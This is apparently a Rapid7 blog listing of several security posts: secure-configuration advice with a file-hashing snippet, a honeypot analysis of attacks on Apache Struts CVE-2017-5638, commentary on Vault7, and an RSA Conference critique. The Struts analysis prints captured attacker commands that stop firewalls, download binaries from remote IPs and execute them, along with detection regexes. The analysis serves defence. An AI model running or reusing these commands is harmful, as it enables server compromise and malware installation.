  • Use file integrity checking tools or application whitelisting tools to ensure your images are not being altered without authorization.
  • Verify your testable configurations and automate this as much as possible – run your vulnerability scanner against your gold image on a regular frequency and use SCAP to streamline reporting and integration.
  • Deploy configuration management tools (SCCM, Puppet/Chef, Casper) to enforce your secure configurations once they are deployed.
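For the file-integrity item above, the core mechanism is comparing cryptographic hashes of gold-image files against a stored baseline. A minimal sketch using Python's hashlib (purpose-built tools such as Tripwire or AIDE do far more, but the principle is the same):

```python
import hashlib
from pathlib import Path

def hash_file(path: Path) -> str:
    """SHA-256 digest of a file, read in chunks to bound memory use."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    return h.hexdigest()

def changed_files(baseline: dict, root: Path):
    """Names of files whose current hash no longer matches the baseline.

    baseline maps relative file names to their known-good digests.
    """
    return [name for name, digest in baseline.items()
            if hash_file(root / name) != digest]
```

Record the baseline when the gold image is built, store it somewhere the image cannot reach, and alert on any non-empty result from changed_files.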


As you can see, there’s quite a bit to getting your systems and applications secured, as well as having processes to support the ongoing care and feeding of your secure configs. This is a foundational control, so it’s important to get right and to keep improving continually. Putting the required time and effort into this will yield a lot of return, simply because your exposure will have shrunk significantly, allowing you to focus on more advanced security measures without worrying about some PowerShell script kiddie popping your box because of insecure telnet. Oh, by the way, you should probably disable telnet.


For more posts examining the CIS Critical Security Controls, search for the tag "CIS 20."

UPDATE - March 10th, 2017: Rapid7 added a check that works in conjunction with Nexpose’s web spider functionality. This check will be performed against any URIs discovered with the suffix “.action” (the default configuration for Apache Struts apps). To learn more about using this check, read this post.


UPDATE - March 9th, 2017:  Scan your network for this vulnerability with check id apache-struts-cve-2017-5638, which was added to Nexpose in content update 437200607.


Attacks spotted in the wild

Yesterday, Cisco Talos published a blog post indicating that they had observed in-the-wild attacks against a recently announced vulnerability in Apache Struts. The vulnerability, CVE-2017-5638, permits unauthenticated Remote Code Execution (RCE) via a specially crafted Content-Type value in an HTTP request. An attacker can create an invalid value for Content-Type which will cause vulnerable software to throw an exception.  When the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed.
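Because the payload rides in the Content-Type header, one crude first-pass detection is to look for OGNL expression markers in that header value. A hedged sketch (a triage heuristic only, not a substitute for patching):

```python
import re

# OGNL payloads for CVE-2017-5638 typically embed expressions such as
# "%{(#_='multipart/form-data')...}" in the Content-Type header.
# This marker list is illustrative and trivially incomplete.
OGNL_MARKERS = re.compile(r"%\{|\$\{|ognl", re.IGNORECASE)

def suspicious_content_type(value: str) -> bool:
    """Flag Content-Type values that look like OGNL injection attempts."""
    return bool(OGNL_MARKERS.search(value))
```

A legitimate Content-Type is a media type plus parameters, so any brace-expression syntax in that header is worth a closer look in proxy or web server logs.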


World Wide Window into the Web

For some time now Rapid7 has been running a research effort called Heisenberg Cloud. The project consists of honeypots spread across every region of five major cloud providers, as well as a handful of collectors in private networks. We use these honeypots to provide visibility into the activities of attackers so that we can better protect our customers as well as provide meaningful information to the public in general. Today, Heisenberg Cloud helped provide information about the scope and scale of the attacks on the Apache vulnerability. In the coming days and weeks, it may also provide information about the evolution and lifecycle of the attacks.


A few words of caution before I continue: please keep in mind that the accuracy of IP physical location here is at the mercy of geolocation databases and it's difficult to tell who the current 0wner(s) of a host are at any given time. Also, we host our honeypots in cloud providers in order to provide broad samples. We are unlikely to see targeted or other scope-limited attacks.


Spreading malware

We use Logentries to query our Heisenberg data and extract meaningful information.  One of the aspects of the attacks is how the malicious traffic has changed over the recent days.  The graph below shows a 72 hour window in time.



The first malicious requests we saw were a pair on Tuesday, March 7th at 15:36 UTC that originated from a host in Zhengzhou, China. Both were HTTP GET requests for /index.aciton (misspelled) and the commands that they executed would have caused a vulnerable target to download binaries from the attacking server. Here is an example of the commands that were sent as a single string in the Content-Type value:


cd /dev/shm;
wget http://XXX.XXX.XXX.92:92/lmydess;
chmod 777 lmydess;
./lmydess;


I've broken the command into lines to make it easier to read. It's pretty standard for a command injection or remote code execution attack against web servers. Basically: move to someplace writable, download code, make sure it's executable, and run it.
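This download-then-run staging shows up across many campaigns, so it is straightforward to flag in captured payloads. A toy heuristic (the patterns are illustrative and easy for an attacker to evade):

```python
import re

# Stages of the classic "fetch and run" injection: download a file,
# mark it executable, then execute it from the working directory.
STAGES = [re.compile(p) for p in (
    r"\b(wget|curl|tftp)\b",   # download stage
    r"\bchmod\s+\+?[0-7x]+",   # make-executable stage
    r"(^|;)\s*\./\S+",         # execution from current directory
)]

def looks_like_dropper(cmd: str) -> bool:
    """True if a command string contains all three dropper stages."""
    return all(p.search(cmd) for p in STAGES)
```

Run over honeypot or WAF logs, a check like this separates dropper attempts from the merely curious probes discussed below.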


After this, the malicious traffic seemed to stop until Wednesday, March 8th at 09:02 UTC when a host in Shanghai, China started sending attacks. The requests differed from the previous attacks. The new attacks were HTTP POSTs to a couple different paths and attempted to execute different commands on the victim:


/etc/init.d/iptables stop;
service iptables stop;
SuSEfirewall2 stop;
reSuSEfirewall2 stop;
cd /tmp;
wget -c http://XXX.XXX.XXX.26:9/7;
chmod 777 7;
./7;


This is similar to the prior commands, but this attacker tries to stop the firewall first. The requested binary was not hosted on the same IP address that attacked the honeypot. In this case the server hosting the binary was still alive and we were able to capture a sample. It appears to be a variant of the XOR DDoS family.


Not so innocent

Much like Talos, in addition to the attempts to spread malware, we see some exploitation of the vulnerability to run "harmless" commands such as whois, ifconfig, and a couple of variations that echoed a value. The word harmless is in quotes because, though the commands weren't destructive, they could have allowed the originator of the request to determine whether the target was vulnerable. They may be part of a research effort to understand the number of vulnerable hosts on the public Internet, or an information-gathering effort in preparation for a later attack. Irrespective of the reason, network and system owners should review their environments.


A little sunshine

Based on the traffic we are seeing at this time, the bulk of the non-targeted malicious traffic appears to be limited attacks from a couple of sources. This could change significantly tomorrow if attackers determine that there is value in exploiting this vulnerability. If you are using Apache Struts, this would be a great time to review Apache's documentation on the vulnerability and then survey your environment for vulnerable hosts. Remember that Apache products are often bundled with other software, so you may have vulnerable hosts of which you are unaware. Expect Nexpose and Metasploit coverage to be available soon to help with detection and validation efforts. If you do have vulnerable implementations of the software in your environment, I would strongly recommend upgrading as soon as safely possible. If you cannot upgrade immediately, you may wish to investigate other mitigation efforts, such as changing firewall rules or network equipment ACLs, to reduce risk. As always, it's best to avoid exposing services to public networks if at all possible.


Good luck!

What follows are some first impressions on the contents of the WikiLeaks Vault7 dump. I won't be addressing the legal or ethical concerns about posting classified data that can endanger the missions and goals of American intelligence organizations. I also won't be talking about whether or not the CIA should be involved in developing cyber capabilities in the first place as we have previously written about our views on this topic. But, I will talk about the technical content of the documents posted today, which all appear to come from a shared, cross-team internal Confluence wiki used by several CIA branches, groups, and teams.


After spending the last few hours poring over the newly released material from WikiLeaks, Vault7, I'm left with the impression that the activities at the CIA with regards to developing cyber capabilities are... pretty normal.


The material is primarily focused on the capabilities of "implants" -- applications that are installed on systems after they've been compromised -- and how they're used to exfiltrate data and maintain persistence after an initial compromise of a variety of devices from Samsung smart TVs to Apple iPhones to SOHO routers, and everything in between.


The material also covers the command and control infrastructure that the CIA maintains to remotely use these implants; primarily, the details are concerned with building and testing the various components that make up this network.


Finally, there are the projects that are focused on exploits. The exploits described are either developed in-house, or acquired from external partners. Most of the internally developed exploits are designed to escalate privileges once access is secured, while most of the remote capabilities were acquired from other intelligence organizations and contractors. The CIA does appear to prefer to develop and use exploits that have a local, physical access component.


While there is still a lot left to look at in detail, the overwhelming impression that I get from reading the material is that working on offensive tech at the CIA is pretty similar to working on any software project at any tech company. More to the point, the CIA activities detailed here are eerily similar to working on Metasploit at Rapid7. Take, for example, this post about the Meterpreter Mettle project from 2015 (which was written about the same time as these documents). Tell me that Mettle doesn't read like any one of the technical overviews in Vault7.

As we spend more time digging through the Vault7 material, and if more material is released over time, I expect we'll be less and less surprised. So far, these documents show that the CIA branches and subgroups named in the documents are behaving pretty much exactly as one might expect of any software development shop. Yes, they happen to be developing exploit code. But, as we all know, that particular capability, in and of itself, isn't novel, illegal, or evil. Rapid7, along with many other security research organizations, both public and private, does so every day for normal and legitimate security purposes.


Until I see something that's strikingly unusual, I'm having a hard time staying worked up over Vault7.

If you walked the RSA Conference floor(s) in San Francisco this year, you probably needed to sit down a few times in passing the 680 vendors - not because of the distance or construction as much as from the sensory overload and Rubik’s cube challenge of matching vendors with the problems they address.


Since Anton Chuvakin already stole my thunder by declaring there was no theme, with snark so effective it made me jealous, I want to talk about the attention-grabbing claims intended to make solutions stand out in the Times Square-like atmosphere, but which instead made it difficult for any new attendee to make sense of it all.


“Buy this technology! It is a silver bullet.”

I was mistakenly convinced that we, as a security industry, had finally moved away from the notion that one solution could solve every security problem. Blame it on fresh-faced marketing teams or true startup believers who’ve poured their heart into a solution and cannot stand the thought of missing payroll. Whatever the cause, the 42,000 attendees were assaulted with promises such as “…prevents all device compromise, stops all ongoing attacks…” and “stop all attacks – remove AV”. Layered defense doesn’t sound sexy and it is often ridiculed as “expense-in-depth”, but it is still unfortunately a reality that no single security vendor can meet all of your needs across the triad of people, process, and technology.


The other half of the “so this technology is all I’ll ever need?” inference is your sudden explosion of options if you want our future machine overlords to defeat the inferior human attackers. Yes, I’m talking about “artificial intelligence” - but it didn’t stop there - one vendor had both AI and “swarm intelligence”. This is where marketing has started to go too far – at best, these solutions have some supervised machine learning algorithms and a data science team regularly using feedback to tune them [which is awesome, but not AI]; at worst, these solutions have unsupervised machine learning spewing out pointless anomalies in datasets unrelated to any realistic attacker behavior. While I loved the drone swarm responsible for the Super Bowl light show, humans were controlling those. If a single endpoint agent can discover a new malicious behavior and immediately communicate it back to the rest of the Borg-like swarm without any human assistance, they had better not quietly announce it for the first time at a conference hall.


“You want hunting, so we built automated, self-healing hunting agents!”

I noticed more vendors offering hunting services, even once as “hunting human attackers” [which caught my eye because of its clarity], and I’m not surprised given the significant barrier to small teams acquiring this advanced skill for detecting unknown threats. However, it’s already been fused with the legitimate demand for more automation in the incident response workflow to bring us a bevy of “automated hunting” and “automating the hunt” technologies, which would be oxymorons if they weren’t just pure contradictions of terms. “Automated hunting” sounds like the built-in indicators inherent to every detection solution I’ve seen, while “automating the hunt” can only be done by an advanced analyst who is scheduling hunts to occur and provide deltas for follow-up analysis, not by a piece of software looking for known indicators and unusual events. Sure, technology simplifies this process by revealing rare and unusual behavior, but detecting known IOCs is not hunting.



In a similar vein, I read about “self-healing endpoints” throughout downtown San Francisco and it brought up a lot more questions than answers. Are the deployed agents healing themselves when disabled? Will it heal my Windows 10 laptop after finding malware on it? Does it automatically restore any encrypted data from a ransomware attack? Can it administer virtual aspirin if it gets an artificial intelligence headache? Obviously, I could have visited a booth and asked these questions, but something tells me the answers would disappoint me.


“Re-imagined! ∞.0! Next-next-gen!”

After the Next-gen Firewall revolution, it seems like everybody is touting SIEM 2.0 and Next-gen AV, and it’s understandable when the available technologies for software development and data processing make leaps forward to enable a redesign of decade-old architectures, but the pace has now quickened. I ran across “deception 2.0” just two years after I first saw TrapX at RSA Conference and only a few months after I heard “deception technology” coined as a term for the niche. At this pace, we’ll be talking about Next-gen Deception and Swarm Intelligence 2.0 by Black Hat. As a general rule, if visitors to your booth have to ask “what is technology ‘x’?”, it’s too soon to start defining your company’s approach to it as 2.0.


As another reimagining of security, I’m enough of a geek to think virtual reality in a SOC sounds cool, but after seeing what it’s like to “bring VR to IR”, I felt like it just adds another skill an analyst needs to develop, on top of a list already so long that specialization is key. Then I remembered how often I see analysts resort to command line interfaces, and the novelty wore off.


There are a lot of innovative approaches to the information security problems we face and I even saw some on display at RSA Conference. I just wish it weren’t such an exhausting fight through the noise to find them.

Filter Blog

By date: By tag: